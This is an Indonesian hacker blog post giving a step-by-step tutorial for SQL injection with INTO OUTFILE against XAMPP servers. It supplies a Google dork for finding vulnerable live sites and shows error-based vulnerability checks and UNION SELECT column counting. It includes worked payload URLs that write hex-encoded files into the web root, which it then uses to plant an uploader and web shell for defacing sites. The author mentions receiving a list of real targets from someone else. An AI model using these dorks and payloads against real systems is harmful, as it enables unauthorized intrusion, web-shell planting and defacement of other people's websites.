Breaking

Minggu, 13 Oktober 2019

Xampp Into Outfile

Halo gaes gaes semuanya, balik lagi sama abang heker tampan idaman f*ck pencitraan nakal tapi tampan๐Ÿ‘Š๐Ÿ˜Ž. Hari ini abang share tutorial Xampp Into Outfile ea gaes. Sebenernya gaada beda nya sih sama SQLi Into Outfile, jujur aja abang gk tau kenapa disebut xampp into outfile :""""v tapi doamat lah ya anjay mabar.

Ya iya karena SQLi Into Outfile berarti cuma bisa di web yg user db nya root gaes, cara cek usernya? user() dan user privileges nya YES.

Langsung aja ges disini gw pake hackbar biar agak enakan dikit xixixi, download hackbarnya cek di postingan Ajaxfilemanager Remote Code Execution
Dork:
intext:xampp/htdocs inurl:php?id=

Langsung aja cari target nya gaes pake dork diatas
Cek vuln nya apa enggak ya tinggal tambahin quote ' aja klu halamannya error berarti vuln!1!1 namanya jg SQLi :""""""V
Disini gw udh punya target sendiri :"v thanks buat abang heker kita xMrCold karena dh kasih lip target na xixixi
Salin dulu path nya itu loh yg C:\xampp\blabla karena penting buat pemasangan shell nya nnti
Langsung aja kita inject kek biasa namanya juga eskieli klu blom ngerti caranya cek postingan Deface Metode SQL Injection
Langsung aja buka hackbar nya :"v
Tempel target dibagian web address lalu inject kek biasa dh.

Disini target gw error di order by 6
Berarti untuk union select nya berhenti sampai angka 5 aja bosQ
Noh kan muncul angka ajaibnya xixixi
Gimana cara taro file/shell nya? Ez.

Kita encode dulu script shell ke hex, kalian bisa mengunjungi web online-toolz.com atau bisa juga gunakan fitur yg ada di hackbar.

Disini gw pake web online-toolz buat encode ke hex
Masukan script shell/uploader mu di bagian input text lalu klik Convert, sebagai contoh disini gw mau bikin file txt yg berisikan text "Tested by NyamuXpl0it" :"""""V
Salin hasil encode nya jangan lupa tambahin 0x didepannya, contoh (0x666)
Lalu masuk ke hackbar lagi dan taro hasil encode nya di angka ajaibnya
Di di bagian nomor belakang tambahin +into+outfile+'dirwebnya/bjir.txt'

Contoh http://localhost/bjir.php?id=11'AND+0+UNION+SELECT+1,2,3,0x546573746564206279204e79616d7558706c306974,5+into+outfile+'C:/xampp/htdocs/bjir.txt'--+-

Lalu klik execute dah :"""v kalau sudah cek dh terup atau blom file nya
Nah kan dh sukses :"v tinggal pasang shell/uploadernya, disini gw pasang uploadernya dlo ges caranya?
Balik ke hackbar dan di bagian angka ajaib kita ganti jadi script uploadernya. Gausah repot repot ke web encode lagi kita bisa gunakan fitur Uploader yg ada di hackbar nya, tinggal klik ada tombol uploader nya otomatis muncul script uploader yg udh di encode ke hex

Contoh http://localhost/bjir.php?id=11'AND+0+UNION+SELECT+1,2,3,uploader-disini,5+into+outfile+'C:/xampp/htdocs/namafile.php'--+-
Namafile.php terserah diganti jadi nama file lo

Tinggal akses aja xixixi
Kalau udah di pasang uploadernya? Ya tinggal upload shell mu atau upload sc depes mu lah gayn bodoh kali la jadi orang.

Btw poc ini juga bisa di ekse pake sqlmap untuk tutorial into outfile pake sqlmap bisa cek di postingan SQLi Into Outfile With Sqlmap.

Ok sampe sini aja tutornya bro, terimakasih spesial buat abang xMrCold udah kasih lip target nya.


Tidak ada komentar:

Posting Komentar